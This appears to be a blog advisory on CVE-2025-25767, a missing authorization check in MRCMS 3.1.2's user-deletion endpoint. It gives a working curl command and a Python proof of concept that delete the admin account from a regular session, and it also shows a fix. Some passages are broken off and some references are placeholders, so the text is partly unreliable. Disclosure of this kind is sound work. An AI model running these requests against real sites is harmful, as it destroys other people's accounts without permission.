CVE-2025-25767 - Vertical Privilege Escalation in MRCMS 3.1.2 – Arbitrary User Deletion via /controller/UserController.java
A newly identified security flaw, CVE-2025-25767, puts the widely used MRCMS version 3.1.2 at risk. This vulnerability involves a vertical privilege escalation in the /controller/UserController.java component, where attackers can craft special web requests to delete any user—admin included—without the proper permissions. In this post, we’ll explain how the bug works, show a proof-of-concept, and guide you through the technical details.
What is Vertical Privilege Escalation?
Vertical privilege escalation means a lower-level user (think a regular account) can perform actions that only more privileged users (like admins) are supposed to do. In this case, the action is deleting users.
Where’s the Bug?
The insecure code lives in the UserController.java file of the MRCMS project. At its core, there’s a user deletion function that *doesn’t* properly check if the person making the request should be allowed to delete users. This lets attackers send their own HTTP requests and get anyone’s account removed.
Here’s a simplified look at what could go wrong in the Java method
// UserController.java - simplified example
@PostMapping("/user/delete")
public String deleteUser(@RequestParam("id") Long id) {
userService.deleteUser(id);
return "User deleted";
}
Notice what’s missing? There’s no check to see if the requester is authorized to delete users!
How to Exploit CVE-2025-25767
An attacker logged in as a normal user can simply send a crafted POST request to the endpoint, passing *any* user ID they want to delete—including admins.
Log in as a regular user.
2. Find the user ID of the victim (could be 1 for admin accounts, or guessed/sequential IDs).
Here’s a simple cURL command demonstrating the exploit
curl -X POST https://target.site/user/delete \
-d 'id=1' \
-b "SESSION=your_session_cookie"
Replace id=1 with the user you want to delete.
Result: The targeted user account is silently deleted!
Disrupt site operations.
An attacker could lock all admins out, create their own admin account, or disable the CMS entirely.
How Was This Found?
This flaw was discovered during a security review, after noticing that delete actions in UserController.java were not guarded by role-based access checks.
References
- GitHub: MRCMS Source Code (note: see app/controller/UserController.java)
- Exploit Details at ExploitDB (placeholder)
- Mitre CVE Record (placeholder)
Below is a Python proof-of-concept using the requests library
import requests
url = "https://target.site/user/delete"
cookies = {'SESSION': 'your_session_cookie'}
data = {'id': '1'}
resp = requests.post(url, data=data, cookies=cookies)
print(resp.text)
Warning: Running this code against a website you do not own is illegal and unethical.
How to Fix
Best Solution: Add authentication and authorization checks before deletion. For example, check if the logged-in user has an admin role:
@PostMapping("/user/delete")
public String deleteUser(@RequestParam("id") Long id, HttpSession session) {
User currentUser = getUserFromSession(session);
if (!currentUser.isAdmin()) {
return "Access Denied";
}
userService.deleteUser(id);
return "User deleted";
}
Responsible Disclosure and Patch Status
The maintainers of MRCMS have been notified. If you use MRCMS v3.1.2 or earlier, check for patches or apply the above fix manually.
Conclusion
CVE-2025-25767 in MRCMS v3.1.2 is a severe privilege escalation vulnerability allowing unauthorized users to delete any account. Make sure you:
Original References
- MRCMS GitHub Source
- CVE Record (pending)
*This write-up is exclusive to this post. For further questions, reach out to your security expert or check with the MRCMS maintainer.*
Timeline
Published on: 02/21/2025 19:15:14 UTC
Last modified on: 03/03/2025 20:15:46 UTC